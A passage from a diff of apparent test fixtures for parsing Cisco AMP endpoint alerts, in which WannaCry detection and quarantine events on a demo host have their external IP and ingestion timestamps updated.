Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419179204872503301\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", + "ingested": "2021-12-09T13:35:55.389091500Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419179217757405000,\"timestamp\":1610623597,\"timestamp_nanoseconds\":329000000,\"date\":\"2021-01-14T11:26:37+00:00\",\"event_type\":\"Threat 
Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419179204872503301\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "553648143", "kind": "alert", "action": "Threat Quarantined", @@ -2694,7 +2694,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -2740,7 +2740,7 @@ "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -2757,8 +2757,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:15:43.965559917Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419179213462438000,\"timestamp\":1610623596,\"timestamp_nanoseconds\":893000000,\"date\":\"2021-01-14T11:26:36+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419179213462437902\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", + "ingested": "2021-12-09T13:35:55.389097100Z", + "original": 
"{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419179213462438000,\"timestamp\":1610623596,\"timestamp_nanoseconds\":893000000,\"date\":\"2021-01-14T11:26:36+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419179213462437902\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -2780,7 +2780,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -2830,7 +2830,7 @@ "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -2847,8 +2847,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:15:43.965561993Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419179213462438000,\"timestamp\":1610623596,\"timestamp_nanoseconds\":456000000,\"date\":\"2021-01-14T11:26:36+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419179213462437899\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"}}}}", + "ingested": "2021-12-09T13:35:55.389102500Z", + "original": 
"{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419179213462438000,\"timestamp\":1610623596,\"timestamp_nanoseconds\":456000000,\"date\":\"2021-01-14T11:26:36+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419179213462437899\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -2870,7 +2870,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -2911,7 +2911,7 @@ "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -2921,8 +2921,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:15:43.965564068Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419179213462438000,\"timestamp\":1610623596,\"timestamp_nanoseconds\":643000000,\"date\":\"2021-01-14T11:26:36+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419179204872503299\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", + "ingested": "2021-12-09T13:35:55.389107800Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419179213462438000,\"timestamp\":1610623596,\"timestamp_nanoseconds\":643000000,\"date\":\"2021-01-14T11:26:36+00:00\",\"event_type\":\"Threat 
Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419179204872503299\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "553648143", "kind": "alert", "action": "Threat Quarantined", @@ -2942,7 +2942,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -2992,7 +2992,7 @@ "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -3009,8 +3009,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:15:43.965566175Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419179209167471000,\"timestamp\":1610623595,\"timestamp_nanoseconds\":957000000,\"date\":\"2021-01-14T11:26:35+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419179209167470602\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"}}}}", + "ingested": "2021-12-09T13:35:55.389113200Z", + "original": 
"{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419179209167471000,\"timestamp\":1610623595,\"timestamp_nanoseconds\":957000000,\"date\":\"2021-01-14T11:26:35+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419179209167470602\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -3032,7 +3032,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -3082,7 +3082,7 @@ "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -3099,8 +3099,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:15:43.965568225Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419179209167471000,\"timestamp\":1610623595,\"timestamp_nanoseconds\":941000000,\"date\":\"2021-01-14T11:26:35+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.ED01EBFBC9-100.SBX.TG\",\"detection_id\":\"6419179209167470598\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"}}}}", + "ingested": "2021-12-09T13:35:55.389118500Z", + "original": 
"{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419179209167471000,\"timestamp\":1610623595,\"timestamp_nanoseconds\":941000000,\"date\":\"2021-01-14T11:26:35+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.ED01EBFBC9-100.SBX.TG\",\"detection_id\":\"6419179209167470598\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -3122,7 +3122,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -3172,7 +3172,7 @@ "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -3189,8 +3189,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:15:43.965570286Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419179209167471000,\"timestamp\":1610623595,\"timestamp_nanoseconds\":941000000,\"date\":\"2021-01-14T11:26:35+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419179209167470601\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"}}}}", + "ingested": "2021-12-09T13:35:55.389124100Z", + "original": 
"{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419179209167471000,\"timestamp\":1610623595,\"timestamp_nanoseconds\":941000000,\"date\":\"2021-01-14T11:26:35+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419179209167470601\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -3212,7 +3212,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -3271,7 +3271,7 @@ "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -3288,8 +3288,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:15:43.965572358Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419179209167471000,\"timestamp\":1610623595,\"timestamp_nanoseconds\":894000000,\"date\":\"2021-01-14T11:26:35+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.ED01EBFBC9-100.SBX.TG\",\"detection_id\":\"6419179204872503300\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\WINDOWS\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"},\"parent\":{\"process_id\":3020,\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\",\"sha1\":\"e889544aff85ffaf8b0d0da705105dee7c97fe26\",\"md5\":\"db349b97c37d22f5ea1d1841e3c89eb4\"}}}}}", + "ingested": "2021-12-09T13:35:55.389129500Z", + "original": 
"{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419179209167471000,\"timestamp\":1610623595,\"timestamp_nanoseconds\":894000000,\"date\":\"2021-01-14T11:26:35+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.ED01EBFBC9-100.SBX.TG\",\"detection_id\":\"6419179204872503300\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\WINDOWS\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\"